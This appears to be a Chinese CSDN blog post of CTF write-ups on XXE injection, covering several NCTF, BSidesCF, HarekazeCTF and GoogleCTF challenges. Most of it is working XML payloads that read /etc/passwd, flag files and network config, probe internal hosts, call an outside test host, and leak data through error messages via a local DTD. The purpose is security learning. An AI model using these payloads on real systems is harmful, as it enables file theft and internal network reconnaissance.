XXE漏洞与CTF题目

最新推荐文章于 2024-03-29 22:06:52 发布
最新推荐文章于 2024-03-29 22:06:52 发布
阅读量195 收藏 1
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62725813/article/details/134893742
版权

1.[NCTF2019]Fake XML cookbook 1

典型的XXE攻击是由

XML声明:<?xml version="1.0"?>

DTD部分(通过特殊的命令去其他文件读取信息)

SYSTEM

XML部分组成

危害:

XXE 可以通过dtd去读取,访问其他文件或者网站,类似于ssrf

<!DOCTFPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]>   DTD部分

<scan>&test;</scan>  XML部分

scan标签设置一个test的实体,这个实体是通过system命令访问1.txt

构造payload

<?xml version="1.0" encoding="utf-8"?>//XML声明

   

<!DOCTYPE note [

  <!ENTITY admin SYSTEM "file:///flag">

  ]>

<user><username>&admin;</username><password>123456</password></user>

2.[NCTF2019]Fake XML cookbook

根据抓包信息,页面以POST的方式传输了XML数据,此时我们可以添加一个恶意外部实体,在原本的XML数据里进行引用,以此达到攻击的目的

定义外部实体

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE a [

  <!ENTITY admin SYSTEM "file:///etc/passwd">

]>

其中a 表示此文档是a类型的文档

ENTITY中的内容表示声明了一个名为admin的外部实体(含SYSTEM就是外部实体),实体内容为读取/etc/passwd信息

定义实体后,在已经存在的< username>标签中可以进行调用,使用&admin;即可

一般flag文件在根目录下,所以直接使用:file:///flag即可

3.[NCTF2019]True XML cookbook Writeup

这里暴露出来很明显的xxe注入点。

我们开始构造payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE hacker[

<!ENTITY a SYSTEM "file:///etc/passwd">

]>

<user><username>&a;</username><password>a</password></user>

我们读取关键文件:/etc/hosts 和 /proc/net/arp。

payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE hacker[

<!ENTITY a SYSTEM "file:///etc/hosts">

]>

<user><username>&a;</username><password>a</password></user>

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE hacker[

<!ENTITY a SYSTEM "file:///proc/net/arp">

]>

<user><username>&a;</username><password>a</password></user>

给了一个主机IP,读取一下:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE hacker[

<!ENTITY a SYSTEM "http://10.106.213.2/">

]>

<user><username>&a;</username><password>a</password></user>

直接报错,但没关系,我们可以进行C段扫描

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE hacker[

<!ENTITY a SYSTEM "http://10.106.213.11/">

]>

<user><username>&a;</username><password>a</password></user>

4.[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize

通过iconv转换成utf-16编码绕过

iconv -f utf8 -t utf-16 1.xml>2.xml

简单概括就是要让finfo_file判断是png但是getimagesize判断不是png就能得到flag。

finfo_file通过文件头来判断,getimagesize还通过长宽等很多其他信息来判断

找一张png图片看一下(ps.要求的图片尺寸要很小,我剪裁了好多次)

保留文件头,其他删掉试一下,记得多删掉一点,留下IHDR就可以了

5.buu-[BSidesCF 2019]SVGMagic

由SVG造成的XXE注入

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///etc/passwd" >

]>

<svg height="200" width="1000">

  <text x="10" y="20">&file;</text>

</svg>

可以读到passwd

读取/proc/self/cwd/flag.txt

/proc/self 链接到当前正在运行的进程

/proc/self/cwd当前工作目录

小本本记下来

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >

]>

<svg height="200" width="1000">

  <text x="10" y="20">&file;</text>

</svg>

6.[GoogleCTF2019 Quals]Bnv -S

.发现通过json格式传送message参数,此处尝试使用xml格式传送数据,如果可以的话,就可以考虑使用xxe进行攻击。

构造xml:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE message [

<!ELEMENT message ANY >

<!ENTITY test "135601360123502401401250">

]>

<message>&test;</message>

服务器成功解析,接下来看看能不能连接外网:

测试xml:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE message [

<!ELEMENT message ANY >

<!ENTITY test "135601360123502401401250">

<!ENTITY % a SYSTEM "https://bbbbb.free.beeceptor.com">

%a;

]>

<message>&test;</message>

注意到当路径错误时会返回错误路径,这让我联想到sql的报错注入,如果把file协议读取到的信息

拼接到路径中是否就可以通过报错显示出来了?

给出paylaod:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE message [

<!ELEMENT message ANY >

<!ENTITY m "135601360123502401401250">

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

<!ENTITY % ISOamsa '

<!ENTITY % flag SYSTEM "file:///flag">

<!ENTITY % getflag "<!ENTITY % test SYSTEM 'file:///%flag;'>">

'>

%local_dtd;%getflag;%test;

]>

<message>&m;</message>

对实体内%,' ,& 进行unicode编码防止报错:

% => %                    ' => '                & => &

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE message [

<!ELEMENT message ANY >

<!ENTITY m "135601360123502401401250">

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

<!ENTITY % ISOamsa '

<!ENTITY &#37; flag SYSTEM "file:///flag">

<!ENTITY &#37; getflag "<!ENTITY &#38;#37; test SYSTEM &#39;file:///%flag;'>">

'>

%local_dtd;%getflag;%test;

]>

<message>&m;</message>

%local_dtd;%getflag;%test;解析过程:

1.初始状态

<!ENTITY % ISOamsa '

<!ENTITY &#37; flag SYSTEM "file:///flag">

<!ENTITY &#37; getflag "<!ENTITY &#38;#37; test SYSTEM &#39;file:///%flag;'>">

'>

%local_dtd;%getflag;%test;

2.解析%local_dtd;

<!ENTITY % flag SYSTEM "file:///flag">

<!ENTITY % getflag "<!ENTITY %#37; test SYSTEM 'file:///%flag;'>">

%getflag;%test;

3.解析%getflag;

<!ENTITY % flag SYSTEM "file:///flag">

<!ENTITY % test SYSTEM 'file:///%flag;'>

%test;

4.解析%test;

此时flag会被拼接到test的路径中,并读取路径,之后就是报错,我们就可以从报错的路径中看到flag

m0_62725813
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE的两道题
现代鲁滨逊的博客
11-27 124
文章目录[NCTF2019]Fake XML cookbook[NCTF2019]True XML cookbook [NCTF2019]Fake XML cookbook [NCTF2019]True XML cookbook
从一道题目学习XXE漏洞
蚁景网安学院
03-01 513
本文涉及知识点实操练习:XXE漏洞分析与实践 (通过该实验了解XXE漏洞的基础知识及演示实践。) 0x01.xxe漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 0x02.xml定
XXE漏洞知识及ctfshow例题
最新发布
2302_80044238的博客
03-29 1112
XXE全称为XML Enternal Entity Injection 中文叫xml外部实体注入简单了解XML:(xml和html的区别可以简易的理解成:xml是用来储存数据和传输数据的而html是用来将数据展现出来)XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构 语法:XML元素都必须有
XXE
shawdow_bug的博客
07-30 326
XML XML(External Markup Language)是一种标记,类似于HTML。与HTML的应用场景不同,XML是用于结构化、存储以及传输信息。 <?xml verison="1.0"?> <!--xml版本说明--> <note> <!--根元素开始标签--> <to>George</to> <!--note元素下的子元素--
CTF中关于XXE(XML外部实体注入)题目两道
生活·代码_这里是青_分享快乐
11-13 1071
题目:UNCTF-Do you like xml? 链接:http://112.74.37.15:8008/ hint:weak password (弱密码) 1、观察后下载图片拖进WINHEX发现提示:flag in flag.php , 进入112.74.37.15:8080/flag.php 发现啥也没有 需要拿下php文件好好看看 2、根据题目hint 尝试登陆 账号密码统...
渗透测试-xxeCTF考题实验及防御方法
lza20001103的博客
04-29 1484
xxeCTF考题实验及防御方法
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
网络安全--XXE漏洞利用思路
jazzz98的博客
05-19 1853
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)
CTF-XXE(持续更新,欢迎分享更多相关知识点的题目)
m0_74317362的博客
08-28 1368
进来看到然后一起看。
XXE漏洞学习之CTF
qq_46085232的博客
04-09 433
两道有关XXECTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
[NCTF2019]Fake XML cookbook 1
shinygod的博客
03-13 1965
知识点:XML实体注入漏洞XXE) 原理:XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 详细了解 查看源代码,访问doLogin.php 访问doLogin.php,提示加载外部xml实体 DOCTYPE(文档类型定义的声明) ENTITY(实体的声明) SYSTEM、PU
CTF XXE漏洞攻击
夏日 の blog
05-07 3716
文章目录Fake XML CookbookTrue XML CookbookISCC 未知的风险-1参考 Fake XML Cookbook F12 查看源码: function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || ...
【web-ctfctf-pikachu-xxe
一个努力生活的人的博客
08-23 244
ctf-pikachu-xxe
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
wanan的博客
09-30 580
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
geoserver xxe漏洞
09-02
XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值